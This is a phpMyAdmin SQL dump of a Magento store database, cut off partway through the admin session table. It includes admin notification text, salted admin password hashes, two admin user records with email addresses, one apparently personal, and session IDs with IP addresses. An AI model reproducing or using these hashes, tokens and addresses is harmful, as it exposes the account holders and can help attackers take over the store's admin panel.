-- phpMyAdmin SQL Dump
-- version 5.2.3
-- https://www.phpmyadmin.net/
--
-- Host: localhost:3306
-- Generation Time: May 12, 2026 at 03:48 PM
-- Server version: 10.2.36-MariaDB
-- PHP Version: 8.4.19

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `bishmoy_main`
--

-- --------------------------------------------------------

--
-- Table structure for table `adminnotification_inbox`
--

CREATE TABLE `adminnotification_inbox` (
  `notification_id` int(10) UNSIGNED NOT NULL COMMENT 'Notification ID',
  `severity` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Problem type',
  `date_added` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Create date',
  `title` varchar(255) NOT NULL COMMENT 'Title',
  `description` text DEFAULT NULL COMMENT 'Description',
  `url` varchar(255) DEFAULT NULL COMMENT 'Url',
  `is_read` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Flag if notification read',
  `is_remove` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Flag if notification might be removed'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Adminnotification Inbox';

--
-- Dumping data for table `adminnotification_inbox`
--

INSERT INTO `adminnotification_inbox` (`notification_id`, `severity`, `date_added`, `title`, `description`, `url`, `is_read`, `is_remove`) VALUES
(1, 4, '2020-08-02 13:13:04', 'Deprecation Notice', 'Catalog Search is currently configured to use the MySQL engine, which has been deprecated. Consider migrating to one of\nthe Elasticsearch engines now to ensure there are no service interruptions during your next upgrade.', '', 0, 0),
(2, 4, '2020-08-02 13:20:29', 'Disable Notice', 'To improve performance, collecting statistics for the Magento Report module is disabled by default. \nYou can enable it in System Config.', '', 0, 0),
(3, 4, '2020-08-07 20:57:02', 'The Essentials of an Unforgettable Customer Experience', 'Learning what’s shaping tomorrow’s shopping experiences is essential for growth. Download our eBook full of advice about crafting a better buying journey using Magento Commerce and other key technologies. Download now: https://bit.ly/31tNXkq', 'https://bit.ly/31tNXkq', 0, 0),
(4, 4, '2020-08-11 16:54:10', 'Turn your website into a conversion machine. Don&#039;t miss this week&#039;s webinar on Aug 13th! ', 'Join us on Aug 13 for our webinar: Is Your Website Selling As Much As It Can? Adobe Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Register now: https://bit.ly/2PcjcL3', 'https://bit.ly/2PcjcL3', 0, 0),
(5, 4, '2020-08-24 17:19:20', 'We would love your input on Magento Payments', 'We value the perspective of our users and we would appreciate if you took this short survey on Magento Payments. Your response will influence the design of the next generation Magento Payments solution. https://bit.ly/2CXZro2', 'https://bit.ly/2CXZro2', 0, 0),
(6, 4, '2020-09-14 13:33:10', 'Get real-time insights into the security status of the store​ with Enhanced Security Scan Tool.', 'The Enhanced Magento Security Scan Tool provides our on-prem and cloud merchants with real-time insights into the security status of their store by proactively notifying them if their store is vulnerable. ', 'https://account.magento.com/scanner ', 0, 0),
(7, 4, '2020-09-14 13:37:29', 'Now Available: Magento Quality Patch (MQP) tool to identify and resolve issues more quickly', 'The introduction of the MQP tool provides a way for you to know which quality patches are available for you installed version and apply or revert them giving you self-service access to resolve issues more quickly.', 'https://support.magento.com/hc/en-us/articles/360047139492-Magento-Quality-Patches-released-a-new-tool-to-self-serve-quality-patches', 0, 0),
(8, 4, '2020-09-16 18:03:56', 'Free 25-Point Website Evaluation for Magento Open Source Users', '​Reach out to us today to get your free 25-point site assessment to identify top conversion drivers and turn your website into a conversion machine.​ Our team of experts will evaluate your site and identify specific areas for conversion improvements. https://bit.ly/3lcgILt', 'https://bit.ly/3lcgILt', 0, 0),
(9, 4, '2020-09-21 17:18:39', 'New resource updates to the Open Source page on Magento.com. ', 'Check out the updated Open Source page on Magento.com. Learn how to maximize your Open Source store, discover offers for Open Source merchants, and view comparison charts between Open Source and Magento Commerce. Go to page: https://adobe.ly/3kCB5jW', 'https://adobe.ly/3kCB5jW', 0, 0),
(10, 4, '2020-09-28 22:07:26', 'Is Your Website Selling as Much as It Can? Watch our on-demand webinar and learn how to turn your website into a conversion machine.', 'Watch our on-demand webinar: Is Your Website Selling As Much As It Can? Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Watch now: https://bit.ly/2EAujMc', 'https://bit.ly/2EAujMc', 0, 0),
(11, 4, '2020-10-06 16:53:57', '[Webinar] Is your site to ready to handle spikes in traffic and transactions? ', 'Your site speed can make or break your conversion rate this holiday season and beyond. Join us on October 15th for a fireside chat &quot;Is Your Website Ready for the 2020 Holiday Season?&quot; to learn what Commerce features you must have, and how to scale your webstore to maximize conversion rates. If you can&#039;t make the live webinar, be sure to register anyway and we&#039;ll send you the recording and slides afterward. Register today: https://bit.ly/33wzXbC', 'https://bit.ly/33wzXbC', 0, 0),
(12, 4, '2020-11-02 16:19:52', '2021 Planning - reach out to us today to get your free site assessment to identify top conversion drivers.  ', 'Considering moving to Magento Commerce in 2021? Would you like a demo or free site assessment? Our team of experts would love to help. Get started now. https://bit.ly/3lcgILt', 'https://bit.ly/3lcgILt', 0, 0),
(13, 4, '2020-11-04 14:28:07', 'Please help prioritize our roadmap - SHORT survey', 'We are looking to better understand how we can help you manage all of your digital ecommerce from one place. Please help us prioritize our roadmap! Very short survey is here! http://selfserve.decipherinc.com/survey/selfserve/9d5/201000', 'http://selfserve.decipherinc.com/survey/selfserve/9d5/201000', 0, 0),
(14, 4, '2020-11-23 19:59:51', 'Upgrade to Magento Commerce quickly with Rapid Deployment Packages', 'Our experienced solution partners offer special design and implementation packages for businesses to upgrade their site quickly and cost effectively. Learn More: https://adobe.ly/3nqaXKx', 'https://adobe.ly/3nqaXKx', 0, 0),
(15, 4, '2020-12-01 22:02:47', '[Video] Fuel Your Business Growth with Magento Commerce', 'Follow along as our friends at Goodacre Farm &amp; Supply transform their business into a cloud-based eCommerce machine with easy content creation, support for multiple web stores, and personalized product recommendations. Watch Now: https://bit.ly/3m8S2mW', 'https://bit.ly/3m8S2mW', 0, 0),
(16, 4, '2020-12-07 16:29:27', 'SURVEY: Business Financing and Support', 'Please complete if you are responsible for your business finances. We&#039;d like to hear from you about your past and future business financing needs. Strictly confidential.', 'http://selfserve.decipherinc.com/survey/selfserve/9d5/g30c/201100', 0, 0),
(17, 4, '2020-12-11 00:37:39', 'Experience the new Interactive Tour to compare Open Source and Magento Commerce.', 'Create closer consumer connections in the New Year. Explore our interactive product simulation and learn how Magento Commerce delivers everything you need to drive growth in an increasingly competitive online market. https://adobe.ly/3okS1wS', 'https://adobe.ly/3okS1wS', 0, 0),
(18, 4, '2021-01-08 21:35:55', 'Happy new year! Is Your Website Selling as Much as It Can? Watch our on-demand webinar and learn how to turn your website into a conversion machine.', 'Watch our on-demand webinar: Is Your Website Selling As Much As It Can? Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Watch now: https://bit.ly/2EAujMc', 'https://bit.ly/2EAujMc', 0, 0),
(19, 4, '2021-01-14 01:32:42', 'You&#039;re invited to our webinar: Is Magento Commerce or Open Source right for you? ', 'Magento Commerce and Magento Open Source may sound alike, but each offers sharply distinct benefits. To get the facts, sign up for our webinar Is Magento Commerce or Open Source right for you? at 10:00 AM PT on February 4th. Register now: http://bit.ly/3icfnTM', 'http://bit.ly/3icfnTM', 0, 0),
(20, 4, '2021-02-10 15:06:05', 'Magento Commerce 2.4.2 delivers important security updates and features to help secure and optimize your store', 'Magento Open Source 2.4.2, along with security-only patches 2.3.6-p1 and 2.4.1-p1, is now generally available. The latest release of Magento Open Source includes important security enhancements along with new functionality and platform quality improvements. With these important updates we strongly recommend that you upgrade to ensure your sites maintain the highest level of security. You can review the release notes for more information about all of the enhancements. Learn how this release can help you save time and maximize resources at Magento.com/blog. ', 'https://devdocs.magento.com/guides/v2.4/release-notes/bk-release-notes.html', 0, 0),
(21, 4, '2021-02-10 15:08:37', 'Register now for Summit 2021 and stay ahead of commerce trends ', 'Learn best practices from digital commerce experts during two days of live keynotes, sessions, and sneak peeks. Understand the latest digital commerce trends, discover industry best practices, and network with peers around the world. Register now!', 'https://summit.adobe.com/na/?utm_source=m1o&amp;utm_medium=rss&amp;utm_campaign=NA_210427_12576_RSS_EVTR_ACOM_FM_Summit_2021_M1_OS', 0, 0),
(22, 4, '2021-02-22 23:52:27', 'Quarterly Business Planning - reach out to us today to get your free site assessment.', 'Would you like a free site assessment? Our best-in-breed commerce solution gives your business unmatched agility and scalability. It&#039;s time to experience limitless eCommerce with no comprises. Learn more: https://bit.ly/3lcgILt', 'https://bit.ly/3lcgILt', 0, 0),
(23, 4, '2021-03-23 00:33:54', 'You&#039;re invited to our webinar this week: How digital commerce can scale B2B selling', 'Digital commerce is fast becoming the default way to buy—even for B2B customers. In just 8 weeks, Byrne Electrical, the leading manufacturer of power and data solutions for numerous industries, launched an eCommerce portal for more than 1,100 of their customers. To learn how they did it, join George Fabis, Director of IT for Byrne, and Slava Kravchuk, CEO &amp; Founder of Atwix, a Magento Commerce solutions partner, for a live discussion on Thursday, March 25. Register Now: https://bit.ly/3r1MCvG', 'https://bit.ly/3r1MCvG', 0, 0),
(24, 4, '2020-09-28 00:00:00', 'BUY MORE - SAVE MORE - PAY LESS', '10% to 25% discount on every extension depending on how much you buy. Check it out. Don&#039;t miss out', 'https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12', 0, 0),
(25, 4, '2020-10-19 00:00:00', 'FREE INSTALLATION - STARTS TODAY', 'Free installation services for all orders from 3+ extensions. Check it out. Don&#039;t miss out', 'https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12', 0, 0),
(26, 4, '2020-10-29 00:00:00', 'Happy Halloween - Spooky Discounts', '20% off on ALL extensions. Reveal the spooky code NOW! No trick---', 'https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12', 0, 0),
(27, 4, '2020-11-26 00:00:00', 'BFCM MEGA SALES 2020 - UP TO 25% OFF', 'Up to 25% off on your order. Black friday starts early. Don&#039;t miss out. Check it out!!!', 'https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=bfcm20', 0, 0),
(28, 4, '2020-12-24 00:00:00', 'XMAS SALES - 20% OFF', 'Merry Christmas and Happy New Year. Visit Mageplaza website to get your 20% off - every extension. Check it out', 'https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=bfcm20', 0, 0),
(29, 4, '2021-01-25 00:00:00', 'FLASH SALES - 10% OFF', '10% OFF on ALL extensions. Flash sales - Ends Anytime. Check it out', 'https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=bfcm20', 0, 0),
(30, 4, '2021-05-11 20:44:41', 'Magento Open Source 2.4.2-p1 &amp; 2.3.7 deliver important security updates', 'The latest releases of Magento Open Source – 2.3.7 and 2.4.2-p1 – are now generally available. The latest release of Magento Open Source includes important security updates. With these important updates we strongly recommend that you upgrade to ensure your sites maintain the highest level of security. You can review the release notes for more information about all of the updates. Learn how this release can help you save time and maximize resources at Magento.com/blog.', 'https://devdocs.magento.com/guides/v2.3/release-notes/bk-release-notes.html ', 0, 0),
(31, 4, '2021-08-10 17:53:11', 'Magento Open Source 2.4.3 available today!', 'Magento Open Source 2.4.3, along with security-only patches 2.4.2-p1 and 2.3.7-p2, is now generally available. Magento Open Source 2.4.3 includes 33 security and 370+ quality improvements, along with performance and scale enhancements.  With these important updates, we strongly recommend that you upgrade to maintain the highest level of security for your sites. Learn how this release can help you save time and maximize resources in our release blog. ', 'http://magento.com/blog/magento-news/get-ready-your-peak-season-adobe-commerce-243', 0, 0),
(32, 4, '2021-10-01 14:44:47', 'New, Simplified Upgrade Process and Lifecycle Policy Helps Reduce Your TCO ', 'Adobe Commerce developed a new release strategy and updated its lifecycle policy in effort to help Merchants lower their total cost of ownership and accelerate their time to innovation. Learn more about how upgrades are now more predictable and easier to implement in our blog.', 'https://magento.com/blog/accelerating-innovation-through-simplified-release-strategy', 0, 0),
(33, 4, '2021-10-22 19:06:48', 'Magento Technology Stack Evaluation Survey', 'Please take a few minutes to fill out this survey https://forms.office.com/r/DLN8K3h2h0. We appreciate your effort to support the future of Adobe Commerce!', 'https://forms.office.com/r/DLN8K3h2h0', 0, 0),
(34, 2, '2022-02-17 16:49:28', 'Security update available for Adobe Commerce | APSB22-12', 'Adobe has released security updates for Adobe Commerce and Magento Open Source. These updates resolve vulnerabilities rated critical. Full details included in security bulletin.', 'https://helpx.adobe.com/security/products/magento/apsb22-12.html', 0, 0),
(35, 2, '2022-03-01 23:33:53', 'Magento Open Source 2.4.4 Coming April 12', 'To help ensure this release delivers the highest standards of security and quality, general availability of Magento Open Source is now planned for April 12. For more information, visit our DevBlog. ', 'https://community.magento.com/t5/Magento-DevBlog/Adobe-Commerce-2-4-4-Now-Coming-April-12/ba-p/492935', 0, 0),
(36, 2, '2022-04-12 16:52:58', 'Magento Open Source 2.4.4 Available Now!', 'Magento Open Source 2.4.4 enables customers to future-proof and accelerate the growth of their digital commerce businesses. This release is our fastest and most scalable version ever, with increased GraphQL API coverage for several Admin features, as well as new capabilities to PWA Studio 12.3.  Learn how this release can help you save time and maximize resources in our release blog. ', 'https://business.adobe.com/blog/perspectives/future-proof-your-business-with-adobe-commerce-2-4-4', 0, 0),
(37, 4, '2022-05-24 15:06:25', 'Prepared to upgrade to Magento Open Source 2.4.4?', 'With 2.3 end of support (EOS) in September and 2.4.0-2.4.3 EOS in November, it is critical to have an upgrade plan in place to make sure your site stays secure, performant and PCI-Compliant. Learn more about how Magento Open Source 2.4.4 will future-proof your business.', 'https://business.adobe.com/blog/perspectives/future-proof-your-business-with-adobe-commerce-2-4-4', 0, 0),
(38, 4, '2022-07-26 16:18:18', 'Expanded video library on the Adobe Commerce Experience League', 'Check out our expanded video library on the Adobe Commerce Experience League that now has a set of 35 short demo videos of our core Adobe Commerce capabilities and support tools.', 'https://experienceleague.adobe.com/docs/commerce-learn/tutorials/overview.html?lang=en', 0, 0),
(39, 1, '2022-10-11 16:58:58', 'Magento Open Source Security Patches Now Available', 'Adobe is excited to announce that Magento Open Source security-only patches 2.4.5-p1 and 2.4.4-p2 are now available to our entire Commerce Community. In this release, you will find several security enhancements. Refer to the Readying your business for peak season shopping blog for more information and other exciting upgrades. ', 'https://business.adobe.com/blog/the-latest/readying-your-business-for-peak-season-shopping', 0, 0),
(40, 1, '2023-03-14 16:47:30', 'Welcome Magento Open Source 2.4.6, along with exciting product updates', 'We are excited to announce that our March release, including Magento Open Source 2.4.6, is now available to our entire Commerce Community. In this core release, you will find several enhancements to platform quality, security, performance, and scale. Also included in this release is the expansion of Payment Services to UK and France. Refer to the Adobe release blog. ', 'https://business.adobe.com/blog/the-latest/7-adobe-commerce-innovations-that-increase-sales-and-performance', 0, 0),
(41, 1, '2023-06-13 14:28:45', 'Magento Open Source June release brings important accessibility and security updates', 'We are excited to announce great new accessibility updates in PWA Studio, along with multiple security updates in our June release. PWA Studio can now address the needs of people with all types, degrees, and combinations of disability. These guidelines make Web content more usable for individuals with changing abilities due to aging and often improve usability for users in general. We also have new security patches for all versions still under support or extended support. ', 'https://business.adobe.com/blog/the-latest/three-rules-of-b2b-commerce-using-adobe-commerce', 0, 0),
(42, 4, '2020-09-28 00:00:00', 'BUY MORE - SAVE MORE - PAY LESS', '10% to 25% discount on every extension depending on how much you buy. Check it out. Don&amp;apos;t miss out', 'https://www.mageplaza.com/deals/', 0, 0),
(43, 4, '2020-10-19 00:00:00', 'FREE INSTALLATION - STARTS TODAY', 'Free installation services for all orders from 3+ extensions. Check it out. Don&amp;apos;t miss out', 'https://www.mageplaza.com/deals/', 0, 0),
(44, 4, '2020-10-29 00:00:00', 'Happy Halloween - Spooky Discounts', '20% off on ALL extensions. Reveal the spooky code NOW! No trick---', 'https://www.mageplaza.com/deals/', 0, 0),
(45, 4, '2020-11-26 00:00:00', 'BFCM MEGA SALES 2020 - UP TO 25% OFF', 'Up to 25% off on your order. Black friday starts early. Don&amp;apos;t miss out. Check it out!!!', 'https://www.mageplaza.com/deals/', 0, 0),
(46, 4, '2020-12-24 00:00:00', 'XMAS SALES - 20% OFF', 'Merry Christmas and Happy New Year. Visit Mageplaza website to get your 20% off - every extension. Check it out', 'https://www.mageplaza.com/deals/', 0, 0),
(47, 4, '2021-01-25 00:00:00', 'FLASH SALES - 10% OFF', '10% OFF on ALL extensions. Flash sales - Ends Anytime. Check it out', 'https://www.mageplaza.com/deals/', 0, 0),
(48, 4, '2021-07-20 00:00:00', 'FLASH SALES - 15% OFF', '15% EXTRA discount on ALL extensions. Flash sales 3 days only. Check it out &amp; get the code', 'https://www.mageplaza.com/deals/', 0, 0),
(49, 4, '2021-07-22 00:00:00', 'LAST CHANCE - 15% OFF', '15% EXTRA discount on ALL extensions. Last day to have it. Ends . Check it out &amp; get the code', 'https://www.mageplaza.com/deals/', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `admin_analytics_usage_version_log`
--

CREATE TABLE `admin_analytics_usage_version_log` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Log ID',
  `last_viewed_in_version` varchar(50) NOT NULL COMMENT 'Viewer last viewed on product version'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin Notification Viewer Log Table';

--
-- Dumping data for table `admin_analytics_usage_version_log`
--

INSERT INTO `admin_analytics_usage_version_log` (`id`, `last_viewed_in_version`) VALUES
(1, '2.3.5-p1');

-- --------------------------------------------------------

--
-- Table structure for table `admin_passwords`
--

CREATE TABLE `admin_passwords` (
  `password_id` int(10) UNSIGNED NOT NULL COMMENT 'Password ID',
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'User ID',
  `password_hash` varchar(100) DEFAULT NULL COMMENT 'Password Hash',
  `expires` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Deprecated',
  `last_updated` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Last Updated'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin Passwords';

--
-- Dumping data for table `admin_passwords`
--

INSERT INTO `admin_passwords` (`password_id`, `user_id`, `password_hash`, `expires`, `last_updated`) VALUES
(1, 1, '8ba57981b39501dbaeca35126c9abac9402369b027014fb3b2c0f2bf514a6a2f:r9zGNjNPjXIr9dqX:2', 0, 1596374451),
(2, 2, '018d8f8b19378cf6e6588f336c80e4282564cdc840f50b279e41194d1927c3a7:oOiWsFF3Y9GX9IuIOf8INbWTB4HcKDFb:1', 0, 1596875486),
(3, 2, 'f931e6ece3c3681c2a2f853501cbda3d714a7ddf105081e3effac7f45b1318db:UxzlPKNZD3sOxNY9:2', 0, 1618289720),
(4, 2, '655ee3ef00b72fed07576e22b0ccfd8d60d51b2b1391ba7cac1f385f04db73fd:YFpPTdzFJk9NIQJ6:2', 0, 1763438248);

-- --------------------------------------------------------

--
-- Table structure for table `admin_system_messages`
--

CREATE TABLE `admin_system_messages` (
  `identity` varchar(100) NOT NULL COMMENT 'Message ID',
  `severity` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Problem type',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Create date'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin System Messages';

-- --------------------------------------------------------

--
-- Table structure for table `admin_user`
--

CREATE TABLE `admin_user` (
  `user_id` int(10) UNSIGNED NOT NULL COMMENT 'User ID',
  `firstname` varchar(32) DEFAULT NULL COMMENT 'User First Name',
  `lastname` varchar(32) DEFAULT NULL COMMENT 'User Last Name',
  `email` varchar(128) DEFAULT NULL COMMENT 'User Email',
  `username` varchar(40) DEFAULT NULL COMMENT 'User Login',
  `password` varchar(255) NOT NULL COMMENT 'User Password',
  `created` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'User Created Time',
  `modified` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'User Modified Time',
  `logdate` timestamp NULL DEFAULT NULL COMMENT 'User Last Login Time',
  `lognum` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'User Login Number',
  `reload_acl_flag` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Reload ACL',
  `is_active` smallint(6) NOT NULL DEFAULT 1 COMMENT 'User Is Active',
  `extra` text DEFAULT NULL COMMENT 'User Extra Data',
  `rp_token` text DEFAULT NULL COMMENT 'Reset Password Link Token',
  `rp_token_created_at` timestamp NULL DEFAULT NULL COMMENT 'Reset Password Link Token Creation Date',
  `interface_locale` varchar(16) NOT NULL DEFAULT 'en_US' COMMENT 'Backend interface locale',
  `failures_num` smallint(6) DEFAULT 0 COMMENT 'Failure Number',
  `first_failure` timestamp NULL DEFAULT NULL COMMENT 'First Failure',
  `lock_expires` timestamp NULL DEFAULT NULL COMMENT 'Expiration Lock Dates',
  `refresh_token` text DEFAULT NULL COMMENT 'Email connector refresh token'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin User Table';

--
-- Dumping data for table `admin_user`
--

INSERT INTO `admin_user` (`user_id`, `firstname`, `lastname`, `email`, `username`, `password`, `created`, `modified`, `logdate`, `lognum`, `reload_acl_flag`, `is_active`, `extra`, `rp_token`, `rp_token_created_at`, `interface_locale`, `failures_num`, `first_failure`, `lock_expires`, `refresh_token`) VALUES
(1, 'afridi', 'afridi', 'mdfoysalafridi01963689205@gmail.com', 'afridi', '8ba57981b39501dbaeca35126c9abac9402369b027014fb3b2c0f2bf514a6a2f:r9zGNjNPjXIr9dqX:2', '2020-08-02 13:20:51', '2021-04-13 04:43:48', '2020-08-07 05:21:29', 9, 0, 1, NULL, NULL, NULL, 'en_US', 1, '2021-04-13 04:43:48', NULL, NULL),
(2, 'Admin', 'Admin', 'developer@echosystech.com', 'admin', '655ee3ef00b72fed07576e22b0ccfd8d60d51b2b1391ba7cac1f385f04db73fd:YFpPTdzFJk9NIQJ6:2', '2020-08-08 08:31:26', '2025-11-23 17:56:52', '2025-11-18 05:11:06', 114, 0, 1, '{\"configState\":{\"general_country\":\"1\",\"general_region\":\"1\",\"general_store_information\":\"1\",\"general_single_store_mode\":\"1\",\"general_locale\":\"1\",\"mpbannerslider_general\":\"1\",\"mpbannerslider_module\":\"1\",\"mpbannerslider_mpbannerslider_design\":\"1\",\"admin_emails\":\"1\",\"admin_startup\":\"1\",\"admin_url\":\"1\",\"admin_security\":\"1\",\"admin_captcha\":\"1\",\"admin_usage\":\"1\",\"payment_us_cashondelivery\":\"1\",\"payment_us_banktransfer\":\"1\",\"payment_us_checkmo\":\"1\",\"payment_us_authorizenet_acceptjs\":\"1\",\"payment_us_free\":\"1\",\"payment_us_purchaseorder\":\"1\",\"admin_dashboard\":\"1\",\"sales_dashboard\":\"1\",\"currency_options\":\"1\",\"checkout_options\":\"1\",\"checkout_cart\":\"1\",\"checkout_cart_link\":\"1\",\"checkout_sidebar\":\"1\",\"checkout_payment_failed\":\"1\",\"payment_other_cashondelivery\":\"1\",\"payment_other_checkmo\":\"1\",\"payment_other_account\":\"1\",\"payment_other_recommended_solutions\":\"1\",\"payment_other_express_checkout_other\":\"0\",\"payment_other_other_paypal_payment_solutions\":\"0\",\"payment_other_paypal_group_all_in_one\":\"1\",\"payment_other_other_payment_methods\":\"1\",\"payment_other_klarna_section\":\"0\",\"payment_other_amazon_payment\":\"0\",\"payment_other_banktransfer\":\"0\",\"payment_other_free\":\"0\",\"payment_other_purchaseorder\":\"0\",\"payment_other_deprecated_payment_methods\":\"1\",\"payment_other_authorizenet_acceptjs\":\"0\",\"payment_other_authorizenet_directpost\":\"0\",\"shipping_origin\":\"1\",\"shipping_shipping_policy\":\"1\",\"contact_contact\":\"1\",\"catalog_review\":\"1\",\"catalog_productalert\":\"0\",\"catalog_recently_products\":\"1\",\"catalog_fields_masks\":\"0\",\"catalog_frontend\":\"0\",\"catalog_productalert_cron\":\"0\",\"catalog_placeholder\":\"0\",\"catalog_product_video\":\"0\",\"catalog_price\":\"0\",\"catalog_layered_navigation\":\"0\",\"catalog_search\":\"0\",\"catalog_seo\":\"0\",\"catalog_navigation\":\"0\",\"catalog_downloadable\":\"0\",\"catalog_custom_options\":\"0\",\"reports_options\":\"1\",\"reports_dashboard\":\"0\",\"currency_fixerio\":\"0\",\"currency_currencyconverterapi\":\"1\",\"currency_import\":\"1\",\"web_unsecure\":\"0\",\"web_default\":\"1\",\"web_default_layouts\":\"1\",\"web_url\":\"0\",\"web_seo\":\"0\",\"web_secure\":\"0\"}}', NULL, NULL, 'en_US', 3, '2025-11-19 23:18:44', NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `admin_user_session`
--

CREATE TABLE `admin_user_session` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `session_id` varchar(128) NOT NULL COMMENT 'Session ID value',
  `user_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Admin User ID',
  `status` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Current Session status',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time',
  `ip` varchar(15) NOT NULL COMMENT 'Remote user IP'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Admin User sessions table';

--
-- Dumping data for table `admin_user_session`
--

INSERT INTO `admin_user_session` (`id`, `session_id`, `user_id`, `status`, `created_at`, `updated_at`, `ip`) VALUES
(1, '6063b90j5ugn4iv24l1qgrbq87', 1, 1, '2020-08-02 13:22:29', '2020-08-02 13:22:29', '::1'),
(2, 'odqermm1o1rmellbc73ce4hr12', 1, 1, '2020-08-02 13:50:08', '2020-08-02 16:05:52', '::1'),
(3, '1m3e2o25u2jf4m8ao0ci52lseo', 1, 1, '2020-08-02 16:25:07', '2020-08-02 16:27:08', '::1'),
(4, 'oe7vbdcskkar8knkppbihklrm3', 1, 1, '2020-08-03 01:19:52', '2020-08-03 01:38:08', '::1'),
(5, '47ohdlo49orgq8pa5q0ssnv70c', 1, 1, '2020-08-03 02:08:24', '2020-08-03 02:09:32', '::1'),
(6, 'tcksn01gsp3vnodng7qaq0sfv2', 1, 1, '2020-08-03 02:38:18', '2020-08-03 02:51:21', '::1'),
(7, 'm461f4k904jv1osfi1tnkhrgqg', 1, 1, '2020-08-03 07:12:14', '2020-08-03 08:06:19', '::1'),
(8, '145t446eu4m85lije0qtni9quq', 1, 1, '2020-08-07 04:33:09', '2020-08-07 04:47:55', '::1'),
(9, 'u48nskup70igjsvlu3bfhvmeeb', 1, 1, '2020-08-07 05:21:29', '2020-08-07 05:36:07', '::1'),
(10, 'gmr5cm837c4mcabve2jbqnsvvc', 2, 1, '2020-08-08 08:31:33', '2020-08-08 08:32:22', '192.168.10.1'),
(11, '9v22ib80shd7ibrbb9fugn21nl', 2, 1, '2020-08-10 01:59:50', '2020-08-10 02:03:44', '192.168.10.249'),
(12, 'e222lsjers4kh9s6vaf556v6gb', 2, 1, '2020-08-10 03:23:00', '2020-08-10 03:34:11', '192.168.10.249'),
(13, '8hbjv4s3dp908s2nugcn387co4', 2, 1, '2020-08-16 23:19:37', '2020-08-17 00:17:49', '192.168.10.249'),
(14, 'lb9ro0oho1j6bu4p0iraso1dc7', 2, 2, '2020-08-17 03:47:01', '2020-08-17 04:06:26', '192.168.10.249'),
(15, 'g11bohed5tegh96ok6vjgq3kjh', 2, 2, '2020-08-17 04:06:26', '2020-08-17 04:35:35', '192.168.10.249'),
(16, 'r7mhssquqnn79ni8r7oqvv48qe', 2, 2, '2020-08-17 04:35:35', '2020-08-17 04:38:13', '192.168.10.249'),
(17, 'u6t1m9p974iptogkbf82euo0g8', 2, 2, '2020-08-17 04:38:13', '2020-08-17 05:22:49', '192.168.10.249'),
(18, 'vk1r0tpldcrj6ov7ssdbargjr3', 2, 2, '2020-08-17 05:22:49', '2020-08-17 05:46:07', '192.168.10.249'),
(19, 'ocbr4j24fbltvar606pqdpqmlh', 2, 2, '2020-08-17 05:46:07', '2020-08-17 05:51:39', '192.168.10.249'),
(20, '6ifeaj0n9and97v2gkaiojjbuh', 2, 2, '2020-08-17 05:51:39', '2020-08-17 06:05:49', '192.168.10.249'),
(21, 'jhfjf9kq7bn8n5oriukk9sutet', 2, 1, '2020-08-17 06:05:49', '2020-08-17 06:29:54', '192.168.10.249'),
(22, '4v2r8nnln6htg9n71vj5k436r1', 2, 1, '2020-08-17 06:48:14', '2020-08-17 07:05:23', '192.168.10.249'),
(23, '2lo4n9rqcnigh1ludplsr5j5ed', 2, 1, '2020-08-17 07:53:14', '2020-08-17 07:53:14', '192.168.10.249'),
(24, '65a9h3n1lmj48pg5hneic8dae1', 2, 1, '2020-08-17 09:26:27', '2020-08-17 09:26:55', '192.168.10.249'),
(25, 'rq821ssmfbineq5to54l94r7ji', 2, 1, '2020-08-17 11:03:57', '2020-08-17 11:04:27', '192.168.10.249'),
